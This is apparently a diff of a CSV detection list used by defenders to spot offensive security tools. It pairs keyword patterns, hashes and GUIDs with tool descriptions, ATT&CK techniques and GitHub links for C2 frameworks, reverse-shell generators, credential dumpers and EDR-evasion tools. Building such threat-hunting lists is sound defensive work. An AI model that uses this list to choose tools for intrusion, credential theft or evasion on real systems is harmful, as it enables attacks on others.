-"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*A3h1nt/gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" "*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*a7469955bff5e489d2270d9b389064e1*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","46","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" +"*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","0","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" -"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*aa3939fc357723135870d5036b12a67097b03309*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" "*AAB4D641-C310-4572-A9C2-6D12593AB28E*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" @@ -6938,12 +7081,12 @@ "*aboul3la*","offensive_tool_keyword","Github Username","Github username of pentester known for enumeration tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/aboul3la","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AbuseGithubAPI*.cpp*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*AbuseGithubAPI*.exe*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" -"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ACBypassTest*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Accenture/Spartacus*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" -"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*AccessTokenImpersonationAccount*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Accounts with extra permissions.txt*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" -"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" -"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.*.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*AceLdr.zip*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*acf7a8a9-3aaf-46c2-8aa8-2d12d7681baf*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z" "*acheron-master.zip*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" "*ACLight.ps1*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" @@ -6960,14 +7103,14 @@ "*acltoolkit.git*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-ad*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*acltoolkit-main*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" -"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*acronis_trueimage_xpc_privesc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*AcroRd32.exe FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*Action: Locating SCCM Management Servers*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*Action: Locating SCCM Servers in Registry*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","0","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" "*action=SchTaskCOMHijack *","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","0","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" "*activedirectory/pwns.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","192","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" -"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*activeScan++.py*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","7","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*AD Privesc Automation*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*ad_dns_dump.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*AD_Enumeration_Hunt.ps1*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" "*AD_Enumeration_Hunt-alperen_ugurlu_hack*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" @@ -6979,18 +7122,18 @@ "*adalanche-*.exe*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*Adalanche.git*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" "*adalanche-collector*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" -"*ADCollector.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*adconnectdump.py*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","506","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" 